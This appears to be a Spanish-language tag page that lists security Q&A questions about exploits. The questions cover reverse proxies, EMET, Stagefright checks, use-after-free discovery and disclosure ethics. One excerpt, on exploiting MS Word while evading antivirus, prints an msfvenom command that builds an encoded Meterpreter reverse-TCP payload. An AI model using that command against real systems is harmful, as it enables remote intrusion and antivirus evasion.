Preguntas con etiqueta 'exploit'

1
respuesta

¿Puede un proxy inverso proteger de la explotación del servidor web? [cerrado]

Estoy buscando una solución de seguridad para mi servidor web Apache en el entorno de Windows para servicios autenticados publicados en Internet, no puedo configurar una DMZ porque está muy conectada a todos los demás servidores de esa red. M...
hecha 30.08.2017 - 08:30
1
respuesta

Transferir archivos adjuntos de correo electrónico potencialmente maliciosos a una máquina sin aire

Descripción general : estoy interesado en tener una cuenta de correo electrónico designada para recibir consejos anónimos como parte de una infraestructura de consejos anónimos más grande en mi negocio. El correo electrónico de mi dominio profe...
hecha 20.02.2018 - 04:13
1
respuesta

¿Cómo obtiene acceso el dispositivo ERAD a su cuenta bancaria personal?

Estoy tratando de obtener detalles sobre cómo exactamente este dispositivo ERAD puede acceder y retirarse de las cuentas bancarias personales. enlace Estoy bastante seguro de que el dispositivo realiza una consulta directa a FINCEN y es...
hecha 09.06.2016 - 16:34
1
respuesta

Usando office_word_hta

Estoy intentando explotar MS Word, evitando la detección de AV. Entonces, ¿qué tengo que hacer? Primero, generar la carga útil, por ejemplo: msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe...
hecha 14.09.2017 - 10:24
1
respuesta

Malware o kit de explotación sin un kit de escalado

¿Alguien sabe de algún malware o kit de explotación que no use un kit de escalamiento de privilegios y solo haga cosas maliciosas con un permiso sin privilegios?     
hecha 19.11.2014 - 20:05
1
respuesta

ROP: usar el valor de retorno de la función

¿Es posible llamar a una función y almacenar su valor de retorno en el siguiente marco de pila? Entonces: call foo(); // int foo(); store return value of foo in next stack frame; call bar(int);     
hecha 22.11.2015 - 22:26
2
respuestas

¿Microsoft EMET protege contra el último ataque de Adobe Flash Team Hacking Team de 0 días?

Si no actualizara Adobe Flash y en su lugar usara la versión anterior (desde antes de que se publicara el exploit de Hacking Team 0 días en Internet), en ese caso, Microsoft EMET me protegería del último equipo de Hacking Adobe Flash. Explotació...
hecha 08.08.2015 - 07:39
2
respuestas

¿Cómo encontrar vulnerabilidades de Uso Después de Libre? [cerrado]

Seguí muchos tutoriales sobre la explotación de vulnerabilidades UAF, pero nunca se explicó cómo encontrar y detectar vulnerabilidades UAF en JavaScript o HTML (es decir, con un análisis estático). Mi pregunta es: ¿cómo aplicar ingeniería inv...
hecha 26.03.2016 - 08:33
1
respuesta

Cómo verificar si su teléfono fue hackeado [cerrado]

Dado que el exploit Stagefright es muy común en muchos dispositivos, quería preguntar si hay alguna forma de comprobar si alguien ha utilizado este exploit en un dispositivo determinado. Al igual que verifica los procesos en busca de entradas de...
hecha 19.08.2015 - 12:05
1
respuesta

¿Por qué se publican las vulnerabilidades descubiertas de software en línea sospechoso / ilegal? [cerrado]

Por ejemplo, Tor network se ha visto afectada recientemente por una revelación de un gran exploit en un trabajo de investigación. ¿No se publican los detalles sobre las vulnerabilidades por completo contraproducentes, ya que los desarrolla...
hecha 27.08.2015 - 11:56